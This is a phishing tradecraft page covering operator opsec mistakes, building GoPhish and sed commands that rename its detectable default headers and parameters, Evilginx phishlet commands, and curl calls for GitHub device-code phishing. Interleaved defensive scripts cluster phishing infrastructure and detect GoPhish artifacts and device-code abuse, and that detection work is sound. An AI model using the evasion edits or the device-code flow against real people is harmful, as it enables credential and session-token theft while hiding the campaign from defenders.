Phishing

Phishing is a cybersecurity attack where malicious actors impersonate legitimate organizations (like banks, social media platforms, or email providers) to trick people into revealing sensitive information such as passwords, credit card numbers, or personal data.

Opsec Fails

  • Reusing IPs/Domains: Using the same IP address or domain across multiple campaigns or malware families.
  • No Domain Privacy: WHOIS records exposing registrant info (name, email, phone).
  • Same Registrant Email: Reusing the same email address across domains.
  • Unrotated SSL Certificates: Self-signed or identical certificates reused across phishing sites.
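
Every item in the list above is an attribute a threat-intelligence analyst can pivot on: once two domains share an IP, a registrant email or a certificate, they are treated as one operator's infrastructure. The script below is an added example (not code from the page or from any tool it names) that builds exactly that clustering with union-find over constructed WHOIS / passive-DNS / certificate records; the domains, IPs and hashes are placeholders, and privacy-proxied WHOIS values are treated as noise so they never link unrelated sites.

```python
"""Cluster phishing domains by the infrastructure attributes they share.

Added example, not part of the original page. The records below are
constructed (example.* domains, documentation IPs, fake hashes); a real
run would pull them from WHOIS, passive DNS and certificate transparency.
Each "opsec fail" (shared IP, shared registrant email, reused certificate)
becomes a pivot edge, and union-find merges domains connected by any
chain of such edges.
"""
from collections import defaultdict

# Constructed sample records.
RECORDS = [
    {"domain": "login-secure-bank.example", "ip": "203.0.113.10",
     "registrant_email": "reg1@mail.invalid", "cert_sha256": "aaaa1111"},
    {"domain": "account-verify.example", "ip": "203.0.113.10",
     "registrant_email": "REDACTED FOR PRIVACY", "cert_sha256": "bbbb2222"},
    {"domain": "mfa-reset.example", "ip": "198.51.100.7",
     "registrant_email": "reg1@mail.invalid", "cert_sha256": "cccc3333"},
    {"domain": "portal-update.example", "ip": "198.51.100.8",
     "registrant_email": "REDACTED FOR PRIVACY", "cert_sha256": "cccc3333"},
    {"domain": "unrelated-shop.example", "ip": "192.0.2.44",
     "registrant_email": "REDACTED FOR PRIVACY", "cert_sha256": "dddd4444"},
]

PIVOT_KEYS = ("ip", "registrant_email", "cert_sha256")

# Values shared by many unrelated sites; pivoting on them would create
# false links (privacy-proxied WHOIS, empty fields).
NOISE_VALUES = {"REDACTED FOR PRIVACY", "", None}


def _find(parent, x):
    # Path-halving union-find lookup.
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x


def pivot_edges(records):
    """Return (domain_a, domain_b, key, value) for every shared attribute."""
    first_seen = {}
    edges = []
    for rec in records:
        for key in PIVOT_KEYS:
            value = rec.get(key)
            if value in NOISE_VALUES:
                continue
            if (key, value) in first_seen:
                edges.append((first_seen[(key, value)], rec["domain"], key, value))
            else:
                first_seen[(key, value)] = rec["domain"]
    return edges


def cluster_infrastructure(records):
    """Group domains linked by any chain of shared pivots; sorted lists."""
    parent = {rec["domain"]: rec["domain"] for rec in records}
    for a, b, _key, _value in pivot_edges(records):
        root_a, root_b = _find(parent, a), _find(parent, b)
        if root_a != root_b:
            parent[root_b] = root_a
    clusters = defaultdict(list)
    for domain in parent:
        clusters[_find(parent, domain)].append(domain)
    return sorted(sorted(members) for members in clusters.values())


if __name__ == "__main__":
    for a, b, key, value in pivot_edges(RECORDS):
        print(f"{a} <-> {b} via {key}={value}")
    for members in cluster_infrastructure(RECORDS):
        print("cluster:", ", ".join(members))
```

With the constructed records, the shared IP, the shared registrant email and the reused certificate chain four domains into one cluster even though no single attribute is common to all of them; the fifth domain, which shares only a privacy-proxied WHOIS value, stays separate. On real data the same noise filter needs to cover shared CDN and hosting IPs, which link far too many unrelated sites.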

GoPhish

git clone https://github.com/gophish/gophish.git
cd gophish
go build

IOC

  • X-Gophish-Contact and X-Gophish-Signature

    find . -type f -exec sed -i.bak 's/X-Gophish-Contact/X-Contact/g' {} +
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go
    
    find . -type f -exec sed -i.bak 's/X-Gophish-Signature/X-Signature/g' {} +
    sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go
    
  • Default server name

    sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go
    
  • Default rid parameter

    sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "keyname"/g' models/campaign.go
    
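The defaults the sed commands above rename are also what a mail gateway or SOC can match on when an operator leaves them in place. The script below is an added example (not GoPhish code and not from the page) that checks a captured message and a set of HTTP headers for those defaults: the X-Gophish-Contact and X-Gophish-Signature headers, the rid tracking parameter in lure URLs, and the ServerName constant "gophish" (assumed here to surface as an HTTP Server header). The sample message and headers are constructed.

```python
"""Flag GoPhish default artifacts in a captured email and HTTP headers.

Added example, not code from GoPhish or from the original page. It looks
for the defaults that the sed commands rename: the X-Gophish-Contact and
X-Gophish-Signature headers, the "rid" recipient-tracking query parameter,
and the ServerName constant "gophish" (assumed here to surface as an HTTP
Server header). The sample message and headers are constructed.
"""
import email
import re
from email import policy
from urllib.parse import parse_qs, urlparse

GOPHISH_HEADERS = ("X-Gophish-Contact", "X-Gophish-Signature")
DEFAULT_RID_PARAM = "rid"
DEFAULT_SERVER_NAME = "gophish"
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Constructed sample lure (addresses and URL are placeholders).
SAMPLE_EMAIL = """\
From: IT Helpdesk <helpdesk@example-corp.invalid>
To: user@example-corp.invalid
Subject: Password expiry notice
X-Gophish-Contact: security@example-corp.invalid
Content-Type: text/plain; charset=utf-8

Your password expires today. Reset it here:
http://portal-reset.example/?rid=Ab12Cd34
"""

# Constructed response headers from a landing page / webhook request.
SAMPLE_HTTP_HEADERS = {
    "Server": "gophish",
    "X-Gophish-Signature": "sha256=deadbeef",
}


def find_gophish_indicators(raw_message=None, http_headers=None,
                            rid_param=DEFAULT_RID_PARAM):
    """Return (kind, name, value) findings; an empty list means nothing seen."""
    findings = []
    if raw_message:
        msg = email.message_from_string(raw_message, policy=policy.default)
        for header in GOPHISH_HEADERS:
            if header in msg:  # header lookup is case-insensitive
                findings.append(("mail_header", header, msg[header]))
        body = msg.get_body(preferencelist=("plain", "html"))
        text = body.get_content() if body else ""
        for url in URL_RE.findall(text):
            query = parse_qs(urlparse(url).query)
            if rid_param in query:
                findings.append(("tracking_url", url, query[rid_param][0]))
    if http_headers:
        lower = {k.lower(): v for k, v in http_headers.items()}
        if lower.get("server", "").lower() == DEFAULT_SERVER_NAME:
            findings.append(("http_header", "Server", lower["server"]))
        for header in GOPHISH_HEADERS:
            if header.lower() in lower:
                findings.append(("http_header", header, lower[header.lower()]))
    return findings


if __name__ == "__main__":
    for kind, name, value in find_gophish_indicators(SAMPLE_EMAIL, SAMPLE_HTTP_HEADERS):
        print(f"{kind:13} {name}: {value}")
```

The rid_param argument exists because, as the page shows, the parameter name is a one-line change for the operator; a rule keyed only on the literal "rid" is brittle, so in practice the URL check is better combined with the newly registered domain and the header hits than used alone.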

Evilginx

  • kgretzky/evilginx2 - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
  • evilginxpro - The phishing framework for red teams

    # List Available Phishlets
    phishlets

    # Enable a Phishlet
    phishlets enable <phishlet_name>

    # Disable a Phishlet
    phishlets disable <phishlet_name>

Device Code Phishing

  • GitHub

    curl -X POST https://github.com/login/device/code \
    -H "Accept: application/json" \
    -d "client_id=01ab8ac9400c4e429b23&scope=user+repo+workflow"
    
    curl -X POST https://github.com/login/oauth/access_token \
    -H "Accept: application/json" \
    -d "client_id=01ab8ac9400c4e429b23&device_code=<device_code_from_earlier>&grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code" -k | jq
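
The two curl calls above are the standard device authorization grant (the urn:ietf:params:oauth:grant-type:device_code grant type). What separates a phish from a legitimate CLI login is where the halves of the flow run: the machine that requests the code and polls the token endpoint is the attacker's, while the victim approves the user code from their own browser. The identity provider's logs see both halves, so a successful grant whose polling IP never appears in the user's verification step is the detection signal. The script below is an added example (not from the page or from GitHub) running that check over constructed JSON-lines log events; the event names, fields and network ranges are assumptions, and a real detector would map them onto the provider's actual audit schema and restrict the grant to approved client IDs in policy.

```python
"""Detect device-code grants where the approving user and the polling
client sit on different networks.

Added example, not from the original page. Log lines, event names, IP
ranges and client IDs are constructed; dc-1 is an ordinary CLI login
from one host, dc-2 has the phishing shape (external poller, internal
approver).
"""
import ipaddress
import json
from collections import defaultdict

DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"

# Constructed: networks the organisation's users normally browse from.
CORP_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed JSON-lines identity-provider log.
SAMPLE_LOG = """\
{"ts":"2024-05-01T09:00:00Z","event":"device_authorization","client_id":"cli-app","device_code":"dc-1","ip":"10.20.5.17"}
{"ts":"2024-05-01T09:00:20Z","event":"user_verification","user":"alice","device_code":"dc-1","ip":"10.20.5.17"}
{"ts":"2024-05-01T09:00:25Z","event":"token","grant_type":"urn:ietf:params:oauth:grant-type:device_code","device_code":"dc-1","ip":"10.20.5.17","result":"success"}
{"ts":"2024-05-01T11:12:00Z","event":"device_authorization","client_id":"cli-app","device_code":"dc-2","ip":"203.0.113.9"}
{"ts":"2024-05-01T11:14:40Z","event":"user_verification","user":"bob","device_code":"dc-2","ip":"10.20.7.3"}
{"ts":"2024-05-01T11:14:45Z","event":"token","grant_type":"urn:ietf:params:oauth:grant-type:device_code","device_code":"dc-2","ip":"203.0.113.9","result":"success"}
{"ts":"2024-05-01T12:00:00Z","event":"token","grant_type":"authorization_code","ip":"10.20.9.1","result":"success"}
"""


def _is_corporate(ip):
    return any(ipaddress.ip_address(ip) in net for net in CORP_NETS)


def detect_device_code_abuse(log_text):
    """Return one alert per successful device-code grant whose client-side
    IPs (code request + token poll) never overlap the user-verification IPs."""
    flows = defaultdict(lambda: {"client_id": None, "client_ips": set(),
                                 "user_ips": set(), "users": set(),
                                 "granted": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        kind = ev.get("event")
        if kind == "device_authorization":
            flow = flows[ev["device_code"]]
            flow["client_id"] = ev["client_id"]
            flow["client_ips"].add(ev["ip"])
        elif kind == "user_verification":
            flow = flows[ev["device_code"]]
            flow["user_ips"].add(ev["ip"])
            flow["users"].add(ev["user"])
        elif kind == "token" and ev.get("grant_type") == DEVICE_CODE_GRANT:
            flow = flows[ev["device_code"]]
            flow["client_ips"].add(ev["ip"])
            flow["granted"] = ev.get("result") == "success"

    alerts = []
    for code, flow in flows.items():
        if not (flow["granted"] and flow["client_ips"] and flow["user_ips"]):
            continue
        if not flow["client_ips"].isdisjoint(flow["user_ips"]):
            continue  # same host did both halves: ordinary CLI login
        client_external = any(not _is_corporate(ip) for ip in flow["client_ips"])
        user_internal = all(_is_corporate(ip) for ip in flow["user_ips"])
        alerts.append({
            "device_code": code,
            "client_id": flow["client_id"],
            "users": sorted(flow["users"]),
            "client_ips": sorted(flow["client_ips"]),
            "user_ips": sorted(flow["user_ips"]),
            # External poller plus internal approver is the phishing shape;
            # two internal hosts is the legitimate headless-device case.
            "severity": "high" if client_external and user_internal else "low",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_device_code_abuse(SAMPLE_LOG):
        print(json.dumps(alert))
```

The low-severity branch matters: a user approving a code for a headless server in the data centre also produces an IP mismatch, so the network split, not the mismatch alone, is what carries the weight. Pairing this with a policy that only allows the device code grant for a short list of client IDs removes most of the remaining noise.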
    
